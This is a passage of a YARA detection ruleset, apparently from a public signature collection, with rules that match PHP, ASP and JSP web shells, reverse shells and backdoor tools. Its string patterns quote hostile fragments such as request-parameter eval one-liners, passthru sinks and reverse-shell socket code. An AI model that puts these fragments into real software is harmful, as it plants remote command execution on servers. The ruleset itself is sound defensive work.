        $move_uploaded = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_" ascii
        $runtime_span = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:" ascii
        $return_link = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm" ascii
    condition:
        any of them
}
rule webshell_C99madShell_v_3_0_smowu {
    // smowu.php: login cell template and the "Wordpress Not Found" prompt; either string fires.
    meta:
        description = "Web Shell - file smowu.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "74e1e7c7a6798f1663efb42882b85bee"
    strings:
        $enter_form = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for" ascii
        $wp_not_found = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty" ascii
    condition:
        any of them
}
rule webshell_2008_2009lite_2009mssql {
    // 2008/2009 PHP shells: drive-navigation link and the File Manager free-space header; both required.
    meta:
        description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
        hash1 = "3f4d454d27ecc0013e783ed921eeecde"
        hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
    strings:
        $godir_link = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');" ascii
        $filemgr_free = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all" ascii
    condition:
        $godir_link and $filemgr_free
}
rule webshell_bypass_iisuser_p {
    // bypass-iisuser-p.asp: Eval of a request parameter whose name is built via chr(), followed by the FSO setup.
    meta:
        description = "Web shells - generated from file bypass-iisuser-p.asp"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "924d294400a64fa888a79316fb3ccd90"
    strings:
        $eval_chr_request = "<%Eval(Request(chr(112))):Set fso=CreateObject" ascii
    condition:
        $eval_chr_request
}
rule webshell_php_s_u {
    // s-u.php: pins the "Go Execute" link that precedes the command textarea.
    meta:
        description = "Web Shell - file s-u.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
    strings:
        $go_execute = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea" ascii
    condition:
        $go_execute
}
rule WebShell_zehir4_asp_php {
    // zehir4: title banner and the frames.byZehir execCommand calls; two hits required.
    // Note that $exec_cmd is a prefix of $exec_cmd_co, so the longer fragment alone satisfies the count.
    meta:
        description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
        author = "Florian Roth"
        hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
    strings:
        $title_write = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&" ascii
        $exec_cmd = "frames.byZehir.document.execCommand(" ascii
        $exec_cmd_co = "frames.byZehir.document.execCommand(co" ascii
    condition:
        2 of ($title_write, $exec_cmd, $exec_cmd_co)
}
rule hxdef100 {
    // hxdef100.exe (an executable, despite the "Webshells" description): SafeBoot registry path, a kernel
    // string-conversion import and the tool's own mailslot name; all three required.
    meta:
        description = "Webshells Auto-generated - file hxdef100.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "55cc1769cef44910bd91b7b73dee1f6c"
    strings:
        $rtl_ansi = "RtlAnsiStringToUnicodeString" ascii
        $safeboot_key = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\" ascii
        $mailslot = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH" ascii
    condition:
        $rtl_ansi and $safeboot_key and $mailslot
}
rule FeliksPack3___PHP_Shells_phpft {
    // phpft.php: tool title plus its homepage URL; both required.
    meta:
        description = "Webshells Auto-generated - file phpft.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "60ef80175fcc6a879ca57c54226646b1"
    strings:
        $title_tag = "PHP Files Thief" ascii
        $home_url = "http://www.4ngel.net" ascii
    condition:
        $title_tag and $home_url
}
rule hkshell_hkrmv {
    // hkrmv.exe: a resource-name fragment and the EvilBlade path component; both required.
    meta:
        description = "Webshells Auto-generated - file hkrmv.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
    strings:
        $thumb = "/THUMBPOSITION7" ascii
        $evilblade = "\\EvilBlade\\" ascii
    condition:
        $thumb and $evilblade
}
rule WebShell_mysql_tool {
    // mysql_tool.php: two lines of its SQL dump writer; "2 of them" over two strings means both are required.
    meta:
        description = "PHP Webshells Github Archive - file mysql_tool.php"
        author = "Florian Roth"
        hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
    strings:
        $dump_data = "$dump .= \"-- Dumping data for table '$table'\\n\";" ascii fullword
        $dump_create = "$dump .= \"CREATE TABLE $table (\\n\";" ascii fullword
    condition:
        $dump_data and $dump_create
}
rule webshell_asp_up {
    // up.asp: multipart boundary parsing helpers; either string fires.
    meta:
        description = "Web Shell - file up.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "f775e721cfe85019fe41c34f47c0d67c"
    strings:
        $boundary_pos = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio" ascii
        $content_type = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" ascii fullword
    condition:
        any of them
}
rule bdcli100 {
    // bdcli100.exe: two client-side status messages; both required.
    meta:
        description = "Webshells Auto-generated - file bdcli100.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "b12163ac53789fb4f62e4f17a8c2e028"
    strings:
        $connect_fail = "unable to connect to " ascii
        $corrupted = "backdoor is corrupted on " ascii
    condition:
        $connect_fail and $corrupted
}
rule multiple_webshells_0012 {
    // r57-family super rule: two fragments of the localized form renderer; "2 of them" over two strings requires both.
    meta:
        description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php"
        hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
        hash1 = "911195a9b7c010f61b66439d9048f400"
        hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
        hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
        hash4 = "817671e1bdc85e04cc3440bbd9288800"
    strings:
        $lang_text = "echo sr(15,\"<b>\".$lang[$language.'_text" ascii
        $arrow_in = ".$arrow.\"</b>\",in('text','" ascii
    condition:
        $lang_text and $arrow_in
}
rule multiple_webshells_0008 {
    // c99-family super rule: session copy cleanup, "Make File" handling and the MySQL banner; all four required.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
        hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
        hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
        hash5 = "09609851caa129e40b0d56e90dfc476c"
        hash6 = "671cad517edd254352fe7e0c7c981c39"
    strings:
        $copy_unset = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\"" ascii
        $mkfile_exists = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile" ascii
        $mysql_banner = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr" ascii
        $mkfile_fopen = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m" ascii
    condition:
        all of ($*)
}
rule php_reverse_shell : webshell {
    // Laudanum php-reverse-shell.php: proc_open of the shell, the success banner and the pipe read loop;
    // all three required and the file must be small (< 15KB), which keeps large bundles from matching.
    meta:
        description = "Laudanum Injector Tools - file php-reverse-shell.php"
        author = "Florian Roth"
        reference = "http://laudanum.inguardians.com/"
        date = "2015-06-22"
        hash = "3ef03bbe3649535a03315dcfc1a1208a09cea49d"
    strings:
        $proc_open = "$process = proc_open($shell, $descriptorspec, $pipes);" ascii fullword  /* PEStudio Blacklist: strings */
        $banner = "printit(\"Successfully opened reverse shell to $ip:$port\");" ascii fullword  /* PEStudio Blacklist: strings */
        $pipe_read = "$input = fread($pipes[1], $chunk_size);" ascii fullword  /* PEStudio Blacklist: strings */
    condition:
        filesize < 15KB and $proc_open and $banner and $pipe_read
}
rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {
    // JspSpy-family super rule: permission-column rendering and the File Manager header; two hits required.
    meta:
        description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "b330a6c2d49124ef0729539761d6ef0b"
        hash1 = "d71716df5042880ef84427acee8b121e"
        hash2 = "344f9073576a066142b2023629539ebd"
        hash3 = "32dea47d9c13f9000c4c807561341bee"
        hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
        hash5 = "3ea688e3439a1f56b16694667938316d"
        hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
    strings:
        $perm_cell_plain = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" ascii fullword
        $filemgr_header = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?" ascii
        $execute_checked = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" ascii fullword
        $perm_cell_nowrap = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>" ascii
    condition:
        2 of ($*)
}
rule WebShell_php_webshells_pws {
    // pws.php: POSTed cmd handling, upload copy and the passthru sink; four of six required.
    meta:
        description = "PHP Webshells Github Archive - file pws.php"
        author = "Florian Roth"
        hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
    strings:
        $cmd_check = "if ($_POST['cmd']){" ascii fullword
        $cmd_assign = "$cmd = $_POST['cmd'];" ascii fullword
        $uploaded_msg = "echo \"FILE UPLOADED TO $dez\";" ascii fullword
        $uploaded_exists = "if (file_exists($uploaded)) {" ascii fullword
        $copy_upload = "copy($uploaded, $dez);" ascii fullword
        $passthru = "passthru($cmd);" ascii fullword
    condition:
        4 of ($*)
}
rule Worse_Linux_Shell_php {
    // Worse Linux Shell: server signature row and the "Execute command" input row; either string fires.
    meta:
        description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "8338c8d9eab10bd38a7116eb534b5fa2"
    strings:
        $server_row = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td" ascii
        $execute_row = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd" ascii
    condition:
        any of them
}
rule KA_uShell {
    // KA_uShell.php: HTTP basic-auth password gate and the upload path fallback; both required.
    meta:
        description = "Webshells Auto-generated - file KA_uShell.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "685f5d4f7f6751eaefc2695071569aab"
    strings:
        $auth_gate = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass" ascii
        $upload_path = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" ascii
    condition:
        $auth_gate and $upload_path
}
rule WebShell_Gamma_Web_Shell {
    // Gamma Web Shell (Perl CGI): restricted command allow-list, vendor tag, restricted-mode error, query read; two hits required.
    meta:
        description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
        author = "Florian Roth"
        hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
    strings:
        $ok_commands = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" ascii fullword
        $gamma_group = "### Gamma Group <http://www.gammacenter.com>" ascii fullword
        $restricted_err = "my $error = \"This command is not available in the restricted mode.\\n\";" ascii fullword
        $query_command = "my $command = $self->query('command');" ascii fullword
    condition:
        2 of ($*)
}
rule webshell_webshells_new_PHP1 {
    // PHP1.php: any one string fires.
    // NOTE(review): $bbcode_mangled contains "[url=...]"/"[/url]" fragments, which look like forum markup that
    // leaked into the extracted string; verify it against the sample before relying on it — the other two carry the rule.
    meta:
        description = "Web shells - generated from file PHP1.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
    strings:
        $bbcode_mangled = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" ascii fullword
        $forum_ref = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" ascii fullword
        $preg_e = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " ascii fullword
    condition:
        any of them
}
rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {
    // dC3 PRiV shell (second variant): GET-driven rmdir/copy, self-referencing Last-Modified header,
    // image content-type used to disguise the page; three hits required.
    meta:
        description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"
        author = "Florian Roth"
        hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
    strings:
        $rmdir = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" ascii fullword
        $last_modified = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" ascii fullword
        $gif_type = "header(\"Content-type: image/gif\");" ascii fullword
        $copy_file = "@copy($file,$to) or die (\"[-]Error copying file!\");" ascii fullword
        $rename_all = "if (isset($_GET['rename_all'])) {" ascii fullword
    condition:
        3 of ($*)
}
rule WebShell_Sincap_1_0 {
    // Sincap 1.0 (AventGrup): contact link, title, vendor footer and two loop/assignment fragments; two hits required.
    meta:
        description = "PHP Webshells Github Archive - file Sincap 1.0.php"
        author = "Florian Roth"
        hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
    strings:
        $mailto = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" ascii fullword
        $title = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" ascii fullword
        $vendor = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" ascii fullword
        $readdir_loop = "while (($ekinci=readdir ($sedat))){" ascii fullword
        $deger2 = "$deger2= \"$ich[$tampon4]\";" ascii fullword
    condition:
        2 of ($*)
}
rule webshell_jsp_sys3 {
    // sys3.jsp: upload button, ISO-8859-1 re-encoding of the "path" parameter, gb2312 page directive; all required.
    meta:
        description = "Web Shell - file sys3.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "b3028a854d07674f4d8a9cf2fb6137ec"
    strings:
        $upload_btn = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" ascii fullword
        $path_param = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" ascii
        $page_directive = "<%@page contentType=\"text/html;charset=gb2312\"%>" ascii fullword
    condition:
        $upload_btn and $path_param and $page_directive
}
rule multiple_webshells_0028 {
    // c99-family super rule: two lines of the permission-bit-to-rwx formatter; both required.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
        hash3 = "433706fdc539238803fd47c4394b5109"
        hash4 = "09609851caa129e40b0d56e90dfc476c"
    strings:
        $world_exec = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":" ascii
        $group_exec = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" ascii fullword
    condition:
        $world_exec and $group_exec
}
rule webshell_PHP_Shell_x3 {
    // PHP Shell.php: buildUrl navigation snippet, self-posting form, HTTP-auth gate; two hits required.
    meta:
        description = "Web Shell - file PHP Shell.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
    strings:
        $build_url = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">[" ascii
        $post_form = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input" ascii
        $auth_gate = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(" ascii
    condition:
        2 of ($build_url, $post_form, $auth_gate)
}
rule webshell_jsp_reverse_jsp_reverse_jspbd {
    // jsp-reverse / jspbd: socket construction plus the reader/writer wrappers around it; all three required.
    // Lower score (50): the wrapper lines are ordinary Java I/O idioms, only the trio together is specific.
    meta:
        description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        super_rule = 1
        hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
        hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
        hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
        score = 50
    strings:
        $writer = "osw = new BufferedWriter(new OutputStreamWriter(os));" ascii fullword
        $socket = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" ascii fullword
        $reader = "isr = new BufferedReader(new InputStreamReader(is));" ascii fullword
    condition:
        $writer and $socket and $reader
}
rule webshell_Inderxer {
    // Inderxer.asp: pins the Turkish-labelled "Nereye" (destination) input row.
    meta:
        description = "Web Shell - file Inderxer.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "9ea82afb8c7070817d4cdf686abe0300"
    strings:
        $nereye_row = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ" ascii
    condition:
        $nereye_row
}
rule webshell_webshells_new_Asp {
    // Asp.asp: the MorfiCoder string-reversal decoder and its Execute call; any one string fires.
    meta:
        description = "Web shells - generated from file Asp.asp"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "32c87744ea404d0ea0debd55915010b7"
    strings:
        $execute_reversed = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" ascii fullword
        $decoder_decl = "Function MorfiCoder(Code)" ascii fullword
        $decoder_body = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" ascii fullword
    condition:
        any of them
}
rule webshell_Crystal_Crystal {
    // Crystal.php: tool-menu option list tail and the Tools link; both required.
    meta:
        description = "Web Shell - file Crystal.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "fdbf54d5bf3264eb1c4bff1fac548879"
    strings:
        $ports_option = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value" ascii
        $tools_link = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f" ascii
    condition:
        $ports_option and $tools_link
}
rule rst_sql_php_php {
    // RST MySQL tool: dump path prefix, banner, homepage URL and an inline base64 GIF; two hits required.
    meta:
        description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "0961641a4ab2b8cb4d2beca593a92010"
    strings:
        $dump_path = "C:\\tmp\\dump_" ascii
        $banner = "RST MySQL" ascii
        $home_url = "http://rst.void.ru" ascii
        $gif_bg = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';" ascii
    condition:
        2 of ($*)
}
rule Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 {
    // FaTaLisTiCz_Fx family: hidden "ls" action form and the quicklaunch2 loop; both required, file under 882KB.
    meta:
        description = "Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt"
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
        hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
        hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
        hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
        hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
    strings:
        $ls_form = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" ascii fullword
        $quicklaunch_loop = "foreach($quicklaunch2 as $item) {" ascii fullword
    condition:
        filesize < 882KB and $ls_form and $quicklaunch_loop
}
rule HYTop_CaseSwitch_2005 {
    // 2005.exe: all eight strings required. Most appear to be generic VB6 runtime / COM event-sink symbols
    // and a CommonDialog control name; "By Marcos" is the only author-specific marker, so the all-of
    // condition is what keeps this from matching arbitrary VB6 binaries.
    meta:
        description = "Webshells Auto-generated - file 2005.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "8bf667ee9e21366bc0bd3491cb614f41"
    strings:
        $comdlg_progid = "MSComDlg.CommonDialog" ascii
        $comdlg_ctrl = "CommonDialog1" ascii
        $vba_except = "__vbaExceptHandler" ascii
        $sink_release = "EVENT_SINK_Release" ascii
        $sink_addref = "EVENT_SINK_AddRef" ascii
        $by_marcos = "By Marcos" ascii
        $sink_qi = "EVENT_SINK_QueryInterface" ascii
        $meth_call = "MethCallEngine" ascii
    condition:
        all of ($*)
}
rule uploader {
    // uploader.php: pins the move_uploaded_file call that drops the upload as entrika.php.
    meta:
        description = "Webshells Auto-generated - file uploader.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "b9a9aab319964351b46bd5fc9d6246a8"
    strings:
        $drop_entrika = "move_uploaded_file($userfile, \"entrika.php\"); " ascii
    condition:
        $drop_entrika
}
rule webshell_jsp_cmd {
    // cmd.jsp: pins the line that echoes the "cmd" request parameter back into the page.
    meta:
        description = "Web Shell - file cmd.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "5391c4a8af1ede757ba9d28865e75853"
    strings:
        $echo_cmd = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" ascii fullword
    condition:
        $echo_cmd
}
rule webshell_browser_201_3_ma_ma2_download {
    // JSP file-browser family: editor row constant, tempdir default, hidden dir field; two hits required.
    meta:
        description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "37603e44ee6dc1c359feb68a0d566f76"
        hash1 = "a7e25b8ac605753ed0c438db93f6c498"
        hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
        hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
        hash4 = "4b45715fa3fa5473640e17f49ef5513d"
        hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
    strings:
        $editfield_rows = "private static final int EDITFIELD_ROWS = 30;" ascii fullword
        $tempdir = "private static String tempdir = \".\";" ascii fullword
        $hidden_dir = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\"" ascii
    condition:
        2 of ($editfield_rows, $tempdir, $hidden_dir)
}
rule WebShell_php_webshells_lostDC {
    // lostDC.php: host info line, download header, generation-time footer, mkdir of a POSTed dir, shellexec call; two hits required.
    meta:
        description = "PHP Webshells Github Archive - file lostDC.php"
        author = "Florian Roth"
        hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
    strings:
        $server_info = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" ascii fullword
        $download_header = "header ( \"Content-Description: Download manager\" );" ascii fullword
        $gen_time = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second" ascii
        $mkdir_post = "if (mkdir($_POST['dir'], 0777) == false) {" ascii fullword
        $shellexec = "$ret = shellexec($command);" ascii fullword
    condition:
        2 of ($*)
}
rule asp_shell : webshell {
    // Laudanum shell.asp: form, default dir command, WScript.Shell Exec, timeout, cmd from the form, project URL
    // and the variable declaration; four of seven required and the file must be under 15KB.
    meta:
        description = "Laudanum Injector Tools - file shell.asp"
        author = "Florian Roth"
        reference = "http://laudanum.inguardians.com/"
        date = "2015-06-22"
        hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"
    strings:
        $shell_form = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" ascii fullword  /* PEStudio Blacklist: strings */
        $comspec_dir = "%ComSpec% /c dir" ascii fullword  /* PEStudio Blacklist: strings */
        $wshell_exec = "Set objCmd = wShell.Exec(cmd)" ascii fullword  /* PEStudio Blacklist: strings */
        $script_timeout = "Server.ScriptTimeout = 180" ascii fullword  /* PEStudio Blacklist: strings */
        $cmd_from_form = "cmd = Request.Form(\"cmd\")" ascii fullword  /* PEStudio Blacklist: strings */
        $laudanum_url = "' ***  http://laudanum.secureideas.net" ascii fullword
        $dim_vars = "Dim wshell, intReturn, strPResult" ascii fullword  /* PEStudio Blacklist: strings */
    condition:
        filesize < 15KB and 4 of ($*)
}
rule webshell_asp_01 {
    // 01.asp: the classic one-line eval of the "pass" request parameter; fullword so it must stand alone.
    meta:
        description = "Web Shell - file 01.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 50
        hash = "61a687b0bea0ef97224c7bd2df118b87"
    strings:
        $eval_pass = "<%eval request(\"pass\")%>" ascii fullword
    condition:
        $eval_pass
}
rule eBayId_index3 {
    // index3.php: single error-message fragment from the phishing page.
    meta:
        description = "Webshells Auto-generated - file index3.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "0412b1e37f41ea0d002e4ed11608905f"
    strings:
        $errmsg = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
    condition:
        $errmsg
}
rule webshell_jspShell {
    // jspShell.jsp: the "autoUpdate" checkbox and its onblur handler, both required.
    meta:
        description = "Web Shell - file jspShell.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
    strings:
        $checkbox = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
        $onblur   = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
    condition:
        $checkbox and $onblur
}
rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {
    // JspSpy family super-rule: the upload form built from SHELL_NAME and the
    // pre-filled "reg query HKLM\System\CurrentControlSet\Control\T..." option.
    meta:
        description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
        hash1 = "059058a27a7b0059e2c2f007ad4675ef"
        hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
        hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
        hash4 = "8b457934da3821ba58b06a113e0d53d9"
        hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
        hash6 = "14e9688c86b454ed48171a9d4f48ace8"
        hash7 = "b330a6c2d49124ef0729539761d6ef0b"
        hash8 = "d71716df5042880ef84427acee8b121e"
        hash9 = "341298482cf90febebb8616426080d1d"
        hash10 = "29aebe333d6332f0ebc2258def94d57e"
        hash11 = "42654af68e5d4ea217e6ece5389eb302"
        hash12 = "88fc87e7c58249a398efd5ceae636073"
        hash13 = "4a812678308475c64132a9b56254edbc"
        hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
        hash15 = "344f9073576a066142b2023629539ebd"
        hash16 = "32dea47d9c13f9000c4c807561341bee"
        hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
        hash18 = "655722eaa6c646437c8ae93daac46ae0"
        hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
        hash20 = "9c94637f76e68487fa33f7b0030dd932"
        hash21 = "6acc82544be056580c3a1caaa4999956"
        hash22 = "6aa32a6392840e161a018f3907a86968"
        hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
        hash24 = "3ea688e3439a1f56b16694667938316d"
